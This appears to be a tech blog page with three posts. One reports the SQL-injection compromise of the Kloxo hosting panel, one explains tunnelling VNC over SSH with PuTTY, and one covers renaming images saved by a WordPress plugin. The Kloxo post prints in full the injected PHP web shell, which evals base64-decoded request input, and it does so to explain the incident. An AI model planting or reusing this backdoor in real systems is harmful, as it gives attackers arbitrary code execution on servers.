Tuesday, January 28, 2014

Kloxo Compromised & Hacked With an SQL Injection Vulnerability

Kloxo Hack

Kloxo is an open source free web hosting platform that helps a server administrator manage their webservers, database servers, DNS servers and much more using a graphical user interface.

Kloxo is now outdated, and the last issued update was over two years ago.

After zPanel appeared to be vulnerable last month, it seems that Kloxo, which is another free Control Panel is the today's victim.

According to VPSBoard, Kloxo is spawning a huge number of httpd processes and sending out large volumes of traffic as part of a DDOS.

The affected targets are getting their Kloxo installations hacked with SQL Injection through webcommand.php file which is granting the attacker Kloxo admin access.

The attacker is then injecting a file called default.php into every Kloxo account through display.php, and changing the owner of the default.php to root.

The injected default.php contains the following code:
<?php
set_time_limit(0);error_reporting(NULL);
if(($_REQUEST['8ba7afbaaddc67de33a3f'])!=NULL){eval(base64_decode($_REQUEST['8ba7afbaaddc67de33a3f']));}
else{echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title></title></head><body>Access denied.</body ></html >';}
?>
The above code is basically taking an encoded variable that contains a code written by the attacker. The code will be decoded and executed on the server. Just imagine all the fun you can have with someone's server if you are able to execute any command you wish.

As a security measure, it's advised to remove your Kloxo Control Panel and replace it by a up to date Panel.

A good easy to use free control panel that is gaining a lot of popularity lately is: VestaCP
If you want a more complicated free control panel to manage your virtual hosts and servers, you can always go with Virtualmin.


Monday, January 6, 2014

Connecting to VNC Server Securely With Putty On Windows


putty vnc windows ssh tunneling


In my previous post Installing VNC Server on CentOS, I showed you how to install, configure and connect to a VNC Server on CentOS. However, this connection from the client to the server is not secure, and the password sent to the server is sent as plain text over an unsecure channel.

In order to secure the VNC connection and encrypt all the data sent, SSH tunneling can be used to prevent the data from being sent as plain text from the client to the server.

SSH Tunneling can be easily created with Putty on windows. Putty can be downloaded from here.

Open Putty, and write the IP address or hostname of the server:
Putty Open Session

Go to SSH => Auth => Tunnels and write the IP Address and port number of your VNC server and click Add.
Note: All VNC ports start with 590X, where X is the number that you defined on your server in /etc/sysconfig/vncserver. In my example, I'll assume I assigned the number 5 as my port, so the port in Putty will be 5905. (Make sure your replace xxx.xxx.xxx.xxx by your real server ip or hostname).

Putty Tunneling Configuration

Now either click "Open", or go Back to  "Session" and save the session, so that you don't have to re-write the info everytime.
After clicking open, login to your server and make sure you have your VNC server installed and started.
service vncserver restart

Open your VNC Viewer client, and write your localhost IP (always 127.0.0.1) followed by the port number as follows (port number is 5 in my case), and click Connect:

vnc viewer

Enter your VNC password and click OK. Your connection to the server should be tunneled and secured.



Any questions or suggestions? Please leave a comment below!



Sunday, January 5, 2014

Renaming Locally Saved Image Names In FeedWordPress Advanced Filters


Feedwordpress


FeedWordPress Advanced Filters

FeedWordPress Advanced Filters (FAF) is a Wordpress plugin and an extension for FeedWordPress plugin. FAF has many important features, such as the ability to remove specific keywords or HTML tags, save images locally with or without a pre-defined size, setting featured images and much more.

When the images are saved locally, they maintain their original name from the original website. Sometimes this name consists of random characters, a long series of numbers or the original websites name.

Modifying The Code

All this can be changed easily by modifying one line of the code. What I'm going to do is change the name of the image to the following format:

postTitle-websiteName-randomNumber.ImgExtension
For example:
Renaming-Locally-Saved-Image-Names-tech-and-dev-123.jpg

To apply the changes, open /wp-content/plugins/faf/filters/image_filters.php with a text editor, and scroll down to line 423 (in version 0.6), or search for the following line:

$filename = $pathinfo["filename"] . "." . $imgext;

And change it to:

$filename = strtolower(str_replace(" ", "-", $post["post_title"])) . '-' . str_replace('http://',"",get_site_url() ) . '-' . rand(0,time()/1000) . "." . $imgext;

Save the file and upload if necessary.

The first part will rename the image as same as the post title but in lowercase and replace the spaces with dashes. The second part will append the website URL without the http:// part. The third part will generate a random number based on the current time. While the fourth part will append the image extension to the filename.

This method can also help the on-page SEO by giving the images a clear and descriptive name.

Any questions? Please leave your comment below!